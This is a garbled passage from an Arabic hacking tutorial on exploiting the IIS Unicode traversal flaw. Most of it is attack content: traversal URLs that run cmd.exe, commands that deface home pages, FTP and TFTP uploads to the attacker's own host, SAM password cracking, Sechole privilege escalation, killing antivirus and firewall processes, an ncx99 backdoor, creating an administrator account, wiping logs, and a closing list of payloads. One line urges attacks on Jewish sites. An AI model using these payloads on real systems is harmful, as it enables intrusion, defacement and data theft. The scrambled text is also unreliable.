‬‬ ‫انتهى‪،،،‬‬ ‫‪120‬‬ .‫‪ 5‬لبدء الفحص‬ ‫‪ 6‬لليقاف‬ ‫‪ 7‬شاشة العمليات الجاريه من فحص الثغرات على الموقع‬ ‫‪ 8‬الثغرات الموجوده على الموقع التي نجح اختبارها‬ ‫‪ 9‬لمسح شاشه العمليات و النتائج لعاده البحث مره اخرى على ثغرات اخرى‬ ‫‪ 10‬ال‬ ‫‪ 11‬منفذ ال‬ ‫ملحظ ‪11 10 :‬‬ ‫اذا ما عرفت ال فيجب عليك مسح البيانات‬ ‫‪ 12‬للخروج‬ ‫ملحظه هامه ‪:‬‬ ‫ل تنسو المواقع اليهودية التي تنتظر من يخترقها فأرجو عدم استخدامه ضد الموقع العربية او السلمية‪.

‬‬ ‫‬‫الوامر المستخدمة بواسطة ملف ‪.‬‬ ‫‬‫كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ‬ ‫‬‫‪.‬‬ ‫‪-‬‬ ‫‪121‬‬ .‬‬ ‫ كيفية معرفة مشكلة الـ ‪ Access Denied‬والحلول المتبعة لها ‪.‬‬ ‫‬‫تغيير الصفحة الرئيسية للموقع وعملية الب لوود بواسطة‬ ‫‬‫برنامج ‪. TFTP‬‬ ‫مسح ملفات اللوق حتى ل يتم التعرف عليك ‪. ECHO‬‬ ‫طريقة نسخ ملف الـ ‪ CMD‬لتاحة امكانية الكتابة على الملفات‬ ‫‬‫‪.‬‬ ‫‬‫تاريخ ظهور هذه الثغرة ‪.‬‬ ‫‬‫كيفية ايجاد هذه الثغرات ‪.‫" الختراق عن طريق اليونيكود )الجزء الول( "‬ ‫>ةةةةة<‬ ‫>ةةةةةة‪<sNiper_hEx :‬‬ ‫يحتوى الدرس الول على ) ‪ 13‬نقطة ( وهي كما يلي ‪-:‬‬ ‫تعريف باليونيكود ‪. CMD‬‬ ‫‬‫طريقة تطبيق هذه الثغرات ‪. FTP‬‬ ‫‬‫طريقة كشف باسورد الدمينستريتور ‪.‬‬‫كيفية عمل اكاونت للدخول بواسطة الـ ‪.‬‬ ‫‬‫كيف يتم استغلل ثغرات اليونكود ‪.

CMD‬‬ ‫‬‫الوامر المستخدمه بواسطة ملف الـ ‪ CMD‬وهي امر لنشاء دليل جديد وامر للغاء دليل وامر النسخ‬ ‫وامر النقل وامر الحذف وامر تغيير اسماء الملفات وامر لرؤية محتويات الملف وامر الكتابة داخل أي‬ ‫ملف وامر لسحب أي ملف ‪ ،‬وهي حسب المثلة التالية ‪-:‬‬ ‫‪: http://www...‬‬ ‫‬‫اليونيكود عبارة عن مجموعة من الثغرات في مجموعة خدمة المعلومات التي ركبت مع‬ ‫والذي ياتي عادة مع ‪./winnt/system32/cmd.‬‬ ‫‪%c0%af./winnt/system32/cmd.exe+c:\inetpub\scripts\hEx.xxxx.‬‬ ‫ددددددد ددددددددد دددددد ددد ‪./.‬المر المستخدم لتغيير مسمى الملفات‬ ‫‪%c0%af.xxxx.xxxx.%c0%af.com/msadc/./.‬‬ ‫ددددد ددددد ددد ددددددد ‪..xxxx../winnt/system32/cmd.‬‬ ‫‪-2‬‬ ‫ددد ددد ددددددد ددددد دددددددد ‪..htm‬‬ ‫‪: http://www.%c0%af.‬‬ ‫‪%c0%af../winnt/system32/cmd.htm+hEx.com/msadc/..xxxx.0‬‬ ‫ددددد دددد ددد دددددد ‪.‬‬ ‫‬‫يتم ايجاد هذه الثغرات بطريقتين ‪-:‬‬ ‫بواسطة البرامج اللزمة والمخصصة لكشف هذه الثغرات سواء بالبرامج التي‬ ‫‪-1‬‬ ‫تعمل على نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس ‪.com/msadc/./winnt/system32/cmd.xxxx../winnt/system32/cmd./winnt/system32/cmd.exe+c:\inetpub\scripts\hEx...‫ددددد دددددددددد ‪.com/msadc/./..%c0%af.0 / IIS5.‬امر انشاء دليل جديد‬ ‫‪%c0%af..‬امر الغاء دليل‬ ‫‪%c0%af./winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.mdb‬‬ ‫‪: http://www../.exe?/c+md+c:\hEx‬‬ ‫‪: http://www..%c0%af.ex‬‬ ‫‪e‬‬ ‫‪:‬المر المستخدم للنقل‬ ‫‪http://www.‬المر المستخدم لرؤية محتويات الملف‬ ‫‪%c0%af./.exe?/c+echo+sNiper_hEx+>c:\hEx.exe?/c+rd+c:\hEx‬‬ ‫للمعلومية‪:‬ليمكن الغاء أي دليل ال اذا كان فارغا ً تمام من الملفات والمجلدات‬ ‫‪:‬المر المستخدم للنسخ‬ ‫‪http://www.%c0%af.‬‬ ‫‪%c0%af.com/msadc/. NT4 / Win2k‬‬ ‫‪IIS4.‬‬ ‫‬‫عند تطبيق الثغرة على نظام الـ ‪ IIS4 / IIS5‬يبدا ملف ‪CMD‬بفك شفرة اليونكود في المثال الخطاء‬ ‫ومن هنا يتم استغللها ‪.txt‬‬ ‫‪:‬المر المستخدم لعملية سحب أي ملف‬ ‫‪122‬‬ .....‬‬ ‫بواسطة تطبيق الثغرة على الموقع مباشرة ‪.com/msadc/..com/msadc/..exe?/c+del+c:\hEx.exe?/c+move+c:\winnt\system32\cmd.exe?/c+ren+c:\index.com/msadc/.‬‬ ‫‬‫ليوجد تاريخ محدد لظهور اول ثغرة لليونيكود لذا يعتبر ظهورها بواسطة شخص مجهول ‪anonymous‬‬ ‫‪ ، person‬وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن ليوجد مايثبت صحة هذا الكلم‬ ‫لهذه الثغرات ‪ ،‬فتم استغلل هذه الثغرات من قبل المخترقين وتطوير البرامج اللزمة لها ‪....e‬‬ ‫\‪xe+c:‬‬ ‫‪: http://www.‬المر المستخدم للحذف‬ ‫‪%c0%af.xxxx.txt‬‬ ‫‪:‬المر المستخدم للكتابة داخل أي ملف‬ ‫‪http://www.exe?/c+type+c:\hEx....xxxx.

exe?/c+dir+c‬‬ ‫‪\:http://www./winnt/system32/cmd./.com/msadc/.%c0%af.exe?/c+dir+c‬‬ ‫‪\:http://www.%c0%af..com/scripts/. scripts ..com/msadc/.co‬‬ ‫‪m+>+c:\inetpub\wwwroot\index..com/scripts/./...com/scripts/.%c1%8s.xxxx.exe‬‬ ‫الى مجلد‬ ‫‪inetpub\scripts‬‬ ‫والمر يكون بهذه‬ ‫?‪http://www..‬‬ ‫الغرض من نسخ ملف الـ ‪ CMD‬وهو لعطاء امكانية للكتابة داخل السيرفر في بعض الحالت ويتم نسخه‬ ‫الى مجلد السيكربت بهذه الطريقة ‪-:‬‬ ‫‪CMD‬‬ ‫دددددد ددددددد ددددددد ددد‬ ‫?‪http://www.. _vit_admin .xxxx.com/msadc/.xxxx.exe?/c+dir+c‬‬ ‫‪\:http://www... cgi-bin‬‬ ‫ددددد دددددد دددد ددددددددد ددد ددددد دد ددددد ددد‬ ‫‬‫ددد ‪.com/scripts/w3svc.%c0%af.xxxx.%c0%af.xxxx. samples .xxxx..xxxx.exe?/c+dir +c‬‬ ‫وقد نحتاج الى تغيير مسمى الدليل بحيث يكون ‪-:‬‬ ‫‪Msadc .exe?/c+dir+c‬‬ ‫‪\:http://www.‬‬ ‫‬‫تطبيق الثغرة على الموقع من خلل المتصفح تتم حسب المثلة التالية ‪-:‬‬ ‫‪\:http://www.com/scripts/.exe+c:\inetpub\scripts\w3svc.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd.....%c0%9v. ECHO‬‬ ‫في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه‬ ‫الثغرة ‪-:‬‬ ‫‪\:http://www..exe?/c+dir+c‬‬ ‫فنحتاج الى نسخ ملف‬ ‫الطريقة ‪-:‬‬ ‫‪w3svc../winnt/system32/cmd.xxxx.exe?c+dir+c‬‬ ‫ ددددد ددددد ددددد ددد ‪ Access Denied‬ددددددد ددددددد ددد ‪..htm‬بحيث يكون المر بالشكل التالي ‪-:‬‬ ‫‪http://www../winnt/system32/cmd.‬‬‫تتم معرفة مشكلة الـ ‪ Access Denied‬من خلل المحاولة في حذف أي ملف من أي امتداد ‪ ،‬فعند‬ ‫ظهور رسالة الـ ‪ Access Denied‬فاليك هذه الطرق حتى تتمكن من الكتابة على الملفات والتحكم‬ ‫اكثر على السيرفر ‪-:‬‬ ‫الطريقة الولى نسخ ملف الـ ‪ CMD‬الى دليل السيكربت بمسمى ‪ CMD1‬فسوف يتاح لك‬ ‫‪-1‬‬ ‫امكانية الكتابة باستخدام المر ‪ Copy‬باستخدام هذا المر ‪-:‬‬ ‫‪123‬‬ .com/scripts/w3svc./.exe‬‬ ‫الن بامكاننا استخدام ملف الـ ‪ CMD‬الجديد في الثغرة بدل من الول بهذا الشكل ‪-:‬‬ ‫‪\:http://www.com/msadc/hEx..%c0%af.%c1%1c./winnt/system32/cmd./winnt/system32/cmd.exe+c:\inetpub\scripts\cmd1.‫عليك القيام اول ً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف‬ ‫‪:‬في اخر العنوان كالتالي‬ ‫‪http://www./winnt/system32/cmd1./winnt/system32/cmd..exe?/c+dir+c‬‬ ‫‪\:http://www. iisadmpwd ..exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd../winnt/system32/cmd..com/scripts/.exe‬الى مجلد‬ ‫خلل الثغرة بهذه الطريقة ‪-:‬‬ ‫‪inetpub\scripts‬‬ ‫‪ ،‬الن نقوم بتصفح الموقع من‬ ‫‪\:http://www.com/scripts/.%c0%af../.xxxx.mdb‬‬ ‫ددددد ددددد ددد ددددددد ‪.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail...xxxx.xxxx.com/scripts/.xxxx..exe?/c+dir+c‬‬ ‫الن نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا‬ ‫مايكون في هذا الدليل‬ ‫‪ inetpub\wwwroot\index.xxxx.%c0%af.xxxx..com/msadc/.htm‬‬ ‫ددددد ددد ددد ـــ‬ ‫‬‫ددددددد ‪./winnt/system32/cmd. _vti_bin ..%c0%af.exe?/c+dir+c‬‬ ‫‪\:http://www./winnt/system32/cmd.exe‬‬ ‫بعد نسخ ملف ‪ w3svc.%c0%af.%c0%qf./winnt/system32/cmd.%c1%9c..%c1%pc.

FTP‬‬ ‫‪c+echo+open+ftp./winnt/system32/cmd.shtml‬‬ ‫‪o‬‬ ‫تكون هذه الصفحة داخل مجلد ‪wwwroot/hEx/test.exe?/c+echo+get+index.host.‬‬ ‫‪o‬‬ ‫الن تستطيع الكتابه وتم تخطي مشكلة الـ ‪.exe?/c+echo+anonymous+>>+c:\winnt\mspft.shtml‬‬ ‫‪o‬‬ ‫الن سوف تظهر لك الصفحة ‪.‬‬ ‫الطريقة الرابعة وهي من خلل عمل كراش للسيرفر باستخدام البرامج اللزمة لهذا‬ ‫‪-4‬‬ ‫الغرض وهذه الطريقة غير مجديه في كثير من الحيان ‪.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.exe‬‬ ‫الطريقة الثانية بالتعامل مع الملف ‪ ssinc.exe :‬ونسخها الى مجلد‬ ‫‪-5‬‬ ‫‪ c:\inetpub\scripts‬وتطبيق الثغرة من خللها ‪.ppl/‬‬ ‫‪ -10‬الن يتم تنفيذ امر ‪ ”FTP.exe+c:\inetpub\scripts\cmd1.shtml‬‬ ‫‪o‬‬ ‫كتابة هذا الكود داخل الصفحة >!‪ <--"include file="AAAA[.com‬حيث ان هذا هو الخادم للـ ‪.‬‬ ‫البحث عن ملفات ‪ root.exe‬‬ ‫‪c+copy+c:\winnt\system32\cmd.Com+>>+c:\winnt\mspft.com/msadc/. Access Denied‬‬ ‫‪o‬‬ ‫اذا ظهرت لك صفحة الخطاء رقم ‪ 500‬فمعناها انك لم تقم بتطبيق الطريقة‬ ‫‪o‬‬ ‫بالشكل الصحيح وعليك اعادة المحاولة ‪.exe ، shell.ppl‬وهو عبارة عن خطوات قمنا بانشاءها‬ ‫وموجودة في ملف ‪ mspft.pll‬‬ ‫‪shell.exe ، w3svc.html+>>+c:\winnt\mspft.exe/‬‬ ‫انشاء ملف ‪ mspft.ppl/‬‬ ‫إضافة ‪ User‬قبل ‪ Anonymous‬لزوم الملف الذي قمنا بانشاءه ‪mspft.xxxx./.%c0%af..pll‬بواسطة المر ‪ Echo‬وكتابة فيه التالي ‪open‬‬ ‫‪-2‬‬ ‫‪ ftp.pll‬‬ ‫‪-5‬‬ ‫‪shell.host.‬‬ ‫الن يتم طلب الصفحة من خلل المتصفح ‪http://www.]AA#--‬بحيث ان‬ ‫‪o‬‬ ‫حرف ‪ A‬يتم كتابتة حتى يتعدى ‪ 2049‬حرف ‪.‬‬ ‫‬‫‪-1‬‬ ‫قديمة‬ ‫ددددد ددد دددددد دددددد دددددد ددد ‪.exe?/c+echo+quit+>>+c:\winnt\mspft.xxxx..‬‬ ‫الطريقة الثالثة باستخدام برنامج ‪ NC.ppl/‬‬ ‫الن مطلوب اضافة مجهول ‪ Anonymous‬الى نفس الملف الذي قمنا بانشاءه‬ ‫‪-3‬‬ ‫‪mspft.exe ، sensepost.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.exe?/c+echo+hEx@Hotmail.g‬‬ ‫‪shell.host.exe+c:\inetpub\scripts\shell....ppl‬باحتوائها على مايلي ‪-:‬‬ ‫ ‪Open FTP.htm‬ثم‬ ‫‪-8‬‬ ‫يدرج هنا بدون المسج السابق‬ ‫‪shell.. FTP‬‬ ‫نسخ ملف ‪ CMD‬الى مجلد ‪ Scripts‬باسم ‪ Shell.com+>+c:\winnt\mspft.ppl/‬‬ ‫الن يكتب اوامر الـ ‪ FTP‬اللزمة لسحب الملف من خادم الـ ‪ FTP‬وهي ‪ Get index.ppl/‬‬ ‫هنا نفس السابق ولكن باضافة ‪Quit‬‬ ‫‪-9‬‬ ‫‪shell.Com+>>+c:\winnt\mspft.exe?/c+echo+hEx@Hotmail.exe‬بحيث يتم عمل اب لوود لهذا الملف داخل مجلد‬ ‫‪-3‬‬ ‫الـ ‪ Temp‬في دليل الويندوز ومنه يتم تنفيذ الوامر من خلل موجة الدوز وللمعلومية مجلد الـ ‪Temp‬‬ ‫مفتوح لعمليات الب لوود ‪.Com‬الى نفس الملف الذي قمنا بانشاءه‬ ‫‪-4‬‬ ‫‪mspft.ppl/‬‬ ‫يتم هنا ادراج الموقع الحالي للملفات‬ ‫‪.com‬‬‫ ‪Anonymous‬‬‫ ‪hEx@Hotmail.‫?‪http://www.ppl/‬‬ ‫الن تكرار لحاجة العداد‬ ‫‪-6‬‬ ‫‪shell.pll‬‬ ‫‪shell.ppl/‬‬ ‫الن مطلوب ادراج البريد ‪ hExRay@Hotmail.Com‬‬‫‪User Anonymous -‬‬ ‫‪124‬‬ .com/test.%c0%af.exe?+"-s:c:winnt\mspft.exe‬حتى يتم الستفادة من ثغرة‬ ‫‪c+copy+c:\winnt\system32\cmd.dll‬والطريقة كما يلي ‪-:‬‬ ‫‪-2‬‬ ‫اول انشاء صفحة باسم ‪test.

TFTP‬‬ ‫‪ -1‬قم بانشاء صفحة وضع شعارك عليها واحفظها باسم ‪ index.‫‪-‬‬ ‫‪hEx@Hotmail.DLL‬‬ ‫اذا كان السيرفر يعتمد في القراءة باستخدام صفحات الـ ‪ ASP‬للوصول الى البيانات من‬ ‫‬‫الـ ‪ MySQL‬فسوف نحتاج الى تطبيق ثغرة ) ‪ ( htr.%c0%af.htm‬على الـ ‪\:c‬‬ ‫‪ -2‬قم بتشغيل برنامج ‪ TFTP‬ونفذ المر في الفقرة التالية ‪.xxxx.Com‬‬ ‫‪-‬‬ ‫‪Get index..com/default..SAM‬في دليل \‬ ‫‬‫‪ \winnt\repair‬وافضل برنامج لفك شفرة الباسورد هو برنامج ‪ L0phtCrack‬كما هو موضح بالشكل‬ ‫التالي‪-:‬‬ ‫اذا كان هناك مستخدمين في السيرفر ويوجد لديهم حساب فان معلوماتهم سوف تكون في‬ ‫‬‫ملف ‪ PASSFILT.+‬للوصول الى باسورد‬ ‫خلل قاعدة‬ ‫المسئول عن هذة القاعده وهي كالتالي ‪-:‬‬ ‫‪http://www..‬‬ ‫ددددد دددددد دددددددد دددددد دددددد دددد دددد‬ ‫‬‫دددددد دددددد ‪.‬‬ ‫‪125‬‬ .inc‬وقراءة محتوياته للعثور على اسم‬ ‫المستخدم والباسورد للمسئول عن قاعدة البيانات ‪./winnt/system32/ftp.%c0%af.html‬‬ ‫‪-‬‬ ‫‪Quit‬‬ ‫‪"msadc/.htr‬‬ ‫عند ظهور صفحة الخطا في الوصول الى الصفحة المطلوبة وبالتحديد في سيكربت التنفيذ فالطريقة‬ ‫صحيحة وماعلينا فقط سوى سحب ملف ‪ database.‬‬ ‫‬‫نحتاج الى وجود برنامجين ) ‪ ( Microsoft Access – L0phtCrack‬وهي لزوم تنفيذ بعض‬ ‫الخطوات لتالية وهي ‪-:‬‬ ‫باسورد الدمينستيتور للسيرفر يكون موجود في ملف الـ ‪ _.DLL‬ونستطيع تحديد مسار هذا الملف من خلل الريجستري بواسطة هذا المفتاح ‪-:‬‬ ‫‪HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SYSTEM32\PASSFILT./..asp+.ppl/‬‬ ‫ددددد ددد دددددد دددددددددددددد ‪.exe?+"-s:c:\winnt\mspft.

1+GET+index.‫‪c+tftp.htm/‬‬ ‫وهو البرنامج اللزم لعمل الب لوود ويجب ان يكون شغال في حالة تنفيذ المر‬ ‫‪tftp.1.htm‬‬ ‫اسم الدليل في السيرفر‬ ‫\‪\inetpub\wwwroot‬‬ ‫اسم الملف على السيرفر‬ ‫‪index.1.log/‬‬ ‫انتهى ‪،،،‬‬ ‫" الختراق عن طريق اليونيكود )الجزء الثاني( "‬ ‫‪126‬‬ .1‬‬ ‫وهو المر اللزم لطلب الملفات مابين الرسال والستقبال‬ ‫‪GET‬‬ ‫اسم الملف بجهازك‬ ‫‪index.1.1.exe+"-i"+1.htm+C:\inetpub\wwwroot\index.htm‬‬ ‫ددد ددددد ددددد ددد دد ددد دددددد دددد ‪.‬‬ ‫‬‫وتتم هذه العملية من خلل حذف ملفات الـ ‪ Log‬من مجلد ‪ System32‬بواسطة المر ‪-:‬‬ ‫‪c+del+c:/winnt/system32/logfiles/*.exe‬‬ ‫وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات‬ ‫"‪"i-‬‬ ‫رقم اليبي الخاص بك‬ ‫‪1.

. Echo‬‬ ‫وبعد ذلك نفذ الثغرة من الملف الجديد ‪ ) CMD1.exe‬هذا شي يعرفه الجميع ( لكن للتذكير فقط !‬ ‫الن عند تصفحك لملفات الموقع من المتصفح ‪ .exe‬وملحقاتها ‪..exe‬‬ ‫جهز العده ‪.‬وانا اكتب هذا الموضوع لشرح كيفية احكام السيطرة على السيرفر والحصول على حساب مكافيء‬ ‫للمدير ‪ (:‬والتمتع بجميع موارد النظام ‪.exe‬‬ ‫‪Tlist.exe‬والسبب هو تفعيل امر الكتابة ‪.‬‬ ‫‪ NCX99 -3‬نسخه مطورة من الباكدوور ‪ NC‬ينصت على المنفذ ‪99‬‬ ‫‪ TFTP32.‬من خلل هذه الثغرة فانه سيكون لديك صلحيات‬ ‫‪ IWAM_USER‬وهذا المستخدم هو عبارة عن يوزر ينتمي للمجموعه ‪ Guest‬وهو اليوزر المسؤوول‬ ‫عن تشغيل سيرفر ‪.‬‬ ‫‪127‬‬ . (:‬‬ ‫لتوفير الوقت جمعتها في مجلد واحد هنا‬ ‫الن سأشرح عمل كل اداة ‪:‬‬ ‫‪ Sechole .‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫في الدرس الول كان عبارة عن اوامر اساسية يستطيع الجميع تطبيقها ‪ ....‬‬ ‫البداية ‪:‬‬ ‫‪-------------‬‬‫عند وجود موقع مصاب بثغرة ما )يونيكود( فان اول شي عليك القيام به هو نسخ مجلد ‪ cmd‬الى ‪cmd1‬‬ ‫بهذه الطريقة ‪:‬‬ ‫‪+C+copy+c:\winnt\system32‬‬ ‫‪ c:\winnt\system32\cmd1.. IIS‬‬ ‫وبما انه من مجموعة ‪ Guest‬فهو ل يملك صلحيات كثيرة !! ال اذا تم اعداده بشكل سيء ‪(:‬‬ ‫ليوجد شي اكثر ادمانا من محاولة الحصول على رووت ‪ (:‬هذا في انظمة *‪ nix‬اما في ‪Microsot‬‬ ‫فالوضع مختلف ‪ (:‬فإن محاولة الحصول على صلحيات ‪ Administrator‬ليس بالسهولة التي تتوقعها ‪(:‬‬ ‫فرفع المتيازات بشكل محلي في انظمة مايكروسوفت ممكن فقط بطرق قليلة ل يتعدى عددها اصابع اليد‬ ‫الواحده ‪ .‬يستطيع من خلله اغتصاب عملية تابعه لمدير النظام يقوم‬ ‫من خللها برفع امتيازاتك ‪.‬اما في هذا الدرس فالمر يتطلب‬ ‫بعض الذكاء والمهارة ‪.exe‬‬ ‫‪ncx99.‬‬ ‫‪ +‬الملفات المطلوبة ‪:‬‬ ‫‪ Sechole...‬وطريقة عمله )بشكل مبسط(‬ ‫بأنه يعتمد على صدع في نواة ويندوز ان تي ‪ .exe -4‬لنقل الملفات الى السيرفر ‪. (:‬‬ ‫‪ Tlist .1‬وهو اقوى استثمار موجود لرفع المتيازات بشكل محلي ‪ ..2‬تقوم بعرض جميع العمليات التي تعمل بالخلفيه ‪ .‬‬ ‫‪Kill..exe‬‬ ‫‪tftpd32..exe -3‬عملها متمم للداة السابقة حيث ستقوم باقفال رقم العملية المستخرج من الداة السابقة ‪.‬والفائده منها هو اقفال الفايروول ‪ +‬النتي‬ ‫فايروس ‪(:‬‬ ‫‪ Kill.

exe‬من المتصفح ‪..‬والن بعد اتمام العمليات السابقة بنجاح ‪ ... KILL. add.bat‬ثم تشغيلها من المتصفح )بواسطة اليونكود(‬ ‫الن لديك حساب مدير ‪ (:‬وتستطيع الدخول الى اي خدمه ‪ ...‬أن التحديثات الخيرة من انتي فايروس تتعامل‬ ‫مع ‪ Sechole‬على انه باكدور ‪ .‬قم بتشغيل‬ ‫‪ (: Sechole.exe‬بهذا الشكل مثل ‪:‬‬ ‫‪http://target/scripts/. TLIST‬ستعرض لك جميع العمليات التي تعمل ‪ . 99‬‬ ‫ستحصل على سطر اوامر ‪ CMD‬بدون امتيازات = ‪.‬‬ ‫سجل رقم ‪ PID‬الخاص بالنتي فايروس والفايروول على ورقه جانبيه ‪.‬‬ ‫هل تذكر اني طلبت منك اقفال الفايروول ؟؟ لماذا ؟‬ ‫لو جربت تنفذ المر ‪ netstat -an‬من خلل سطر اوامر الن سي ‪ ..‬‬ ‫بما اننا لدينا حساب مكافي لـ ‪ Administrator‬ولكننا ل نملك كلمة المرور ‪ .‬إلخ ‪(:‬‬ ‫سؤال ‪ :‬هل تستطيع الدخول بهذا اليوزر ؟ ‪ IWAM_USER‬الى اي خدمه مثل تلنت او اف تي بي ؟؟‬ ‫الجابة ‪ :‬ل ‪ .....‬صحيح اننا قمنا برفع امتيزاته لكننا ل نملك كلمه المرور ! لنه تكون مسنده بشكل عشوائي ‪..exe?/c+C:\ncx99.exe‬‬ ‫بعد ذلك قم بالتصال بالموقع على البورت ‪.‬‬ ‫الن قم بقتل الجراء بالداة ‪ Kill‬بهذا الشكل ‪ .‬‬ ‫القراصنه الذكياء ل يبحثون فقط عن تغيير الصفحه الرئيسية خصوصا اذا كان الموقع مهم او يحتوي على‬ ‫معلومات او قواعد بيانات ‪ ..‬لكن يوجد ماهو اسهل ‪.‬‬ ‫ولكن ليس هذا كل شي ‪.‬ما رأيك بإضافه يوزر جديد‬ ‫باسمك مع باسورد خاصه بك مع امتيازات المدير ايضا !! ‪ (:‬قليل من الذكاء والتفكير ‪(:‬‬ ‫قم بانشاء مستند نصي جديد واضف السطر التالي ‪:‬‬ ‫‪net user Demon pass /add && net localgroup administrators Demon /add‬‬ ‫والن ‪ Save as‬واحفظها باسم ‪.‬‬ ‫ثم قم بتشغيل ‪ ncx99.. Guest‬‬ ‫الن قم بتشغيل الداة ‪ ...‬فانك ستجد من المنافذ ما يسر‬ ‫القلب ‪(:‬‬ ‫‪ 90%‬من السيرفرات اللي دخلتها وكانت محمية بجدران نار ‪ (:‬وجدت المنفذ ‪ 139‬فيها مفتوحا بدون حمايه‬ ‫‪128‬‬ . Access Denided‬‬ ‫وطبعا اهم شي الكتابة على الصفحه الرئيسية بامر اليكو ‪:‬‬ ‫‪+C+Echo+Hacked+by+XDeMoNX‬‬ ‫< ‪C.‬‬ ‫سيذهب تفكير البعض الى الحصول على ملف السام وكسره ‪ (:‬هذا ممكن ‪ ..‫كل ما سبق كان عبارة عن مقدمه ‪ (:‬اما العمل الحقيقي سيبدأ الن ‪:‬‬ ‫اول قم برفع جميع الدوات السابق الى السيرفر ‪. Administrators‬‬ ‫الن بإمكانك تنفيذه جميع الوامر بكامل الحريه وبدون اي مشاكل في الصلحيات ‪.‬‬ ‫عندها سيتم رفم امتيازات ‪ IWAM_USER‬الى مجموعه ‪.À¯.‬قم بالبحث عن رقم العملية ‪PID‬‬ ‫الخاص بالنتي فايروس ان وجد ‪ ../winnt/system32/cmd1.bat‬‬ ‫توضيح ‪ :‬ما فعلناه سابقا هو انشاء مجلد دفعاتي يقوم بانشاء يوزر جديد ‪ Demon‬وكلمة مرور ‪Pass‬‬ ‫واضافته الى مجموعة الدمنستريتورز ‪ (:‬المدراء ‪.‬‬ ‫نرجع لنقطة سابقة ‪.exe PID :‬مكان ‪ PID‬تضع رقم العملية ‪(:‬‬ ‫يسأل البعض ! مالهدف من اقفال النتي فايروس ؟ الجابة ‪ .\inetpub\wwwroot\index+‬‬ ‫‪htm......‬اف تي بي او تلنت او نت بيوس او غيرها ‪(:‬‬ ‫ل تنسى في النهاية مسح الثار واضافة البواب الخلية الخاصة بك لتسهيل الدخول في المرات القادمه ‪(:‬‬ ‫طبعا لن اتوسع في هذا الجانب لنه ) لكل شيخ طريقة!( وكل واحد له اسلوب في اخفاء ادواته والتحكم في‬ ‫الملفات ‪.‬وكذلك اذا وجدت جدار ناري ‪.‬‬ ‫قم الن برفع الملف ‪ add..

.‬الى درجة الحصول على تحكم رسومي ‪. GUI‬‬ ‫لكن لم يكون لدي الوقت الكافي ‪ ..‬والتنسيق الـ أي كلم ‪ (:‬واختصار المعلومات ايضا ‪.. WINvnc‬‬ ‫انتهى‪،،،‬‬ ‫" معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود "‬ ‫‪129‬‬ .‫‪(:‬‬ ‫لذا فان اقفال الفايرول قد يجعل لك اكثر من خيار لسقاط الهدف ‪(:‬‬ ‫اسف على النحو الملء ‪ .‬اذا وجدت وقت فراغ فسأكتب عن طرق اخرى وادوات اخرى مثل‬ ‫‪ GEtAdmin‬و ‪ Sechole2‬وكيفية الحصول على تحكم رسومي بواسطه الداة ‪..‬‬ ‫بالمكان الستعراض اكثر من ذلك بكثير ‪ .

exe?/c+dir+c vti_bin/...exe?/c+dir+c/ msadc/./..exe?/c+dir+c msadc/....%_/ \:%35%63..%255c...%252f.../ %25%35%63.exe?/c+dir+c msadc/..%%35c../../winnt/system32/cmd...%/ \:%35c.%%35%63.%255c...%/ \:%35cwinnt/system32/cmd./winnt/system32/cmd.%255c.%%35%63....%252f..%%35c./....%255c.exe?/ \:c+dir+c MSADC/.exe?/c+dir+c \:scripts/./.%255c./.exe?/c+dir+c/ msadc/...%25%35%63winnt/system32/c \:md.exe?/c+dir+c MSADC/.../ %25%35%63.%25%35%63../winnt/system32/cmd.exe?/c+dir+c MSADC/.%%35%63..%%35%63.exe?/c+dir+c/ \:scripts/...%255c.exe?/c+dir+c vti_bin/.%%35c..exe?/c+dir+c 130 .%25%35%63.../winnt/system32/cmd.....%%35%63.%255c./ %25%35%63./ %25%35%63..%252f../.../winnt/system32/cmd...%25%35%63./.%255cwinnt/system32/cmd...%%35c...exe?/c+dir+c msadc/..%25%35%63.%%35c.%255cwinnt/system32/cmd./.devil2k.exe?/ \:c+dir+c msadc/.%255c._/ \:%255c.%/ \:%35%63winnt/system32/cmd.com (( ‫وهذه مهداه مني انا )) بلك هنتر‬ \:msadc/..%25%35%63./.../winnt/system32/cmd.%%35%63../.../.%25%35%63.exe?/c+dir+c MSADC/....<‫>ةةةةة‬ <‫ ةةةة ةةةة‬:‫>ةةةةةة‬ ‫الموضوع يتكلم عن اساليب التحكم في السيرفر عبر اليونيكود مع بعض المتطلبات‬ : ‫الدوات المطلوبه‬ ‫( اداة مسح ثغرات يونيكود‬1 TFTPD ‫( برنامج سيرفر‬2 ‫( معرفة جيده باليونيكود‬3 ================================================= ================================================= ‫( بأمكانك الحصول على ثغرات اليونيكود من العديد من المواقع او من موقعي‬1 /http://www....%255c.%%35%63.%255c.%255c.%%35c./winnt/system32/cmd.../winnt/system32/cmd.%25%35%63winnt/system32/c \:md..%%35c...%%35%63.exe?/c+dir+c vti_bin/...%_/ \:%35c.%255c...%25%35%63.exe?/c+dir+c/ \:scripts/..%25%35%63..%%35c.../ \:%255cwinnt/system32/cmd./.%255c.%255c.%%35%63...%%35c.exe?/c+dir+c/ \:msadc/.%255c.%255c..%252fwinnt/system32/cmd./winnt/system32/cmd.%255c.%/ \:%35%63.....%255c../ \:%255cwinnt/system32/cmd...

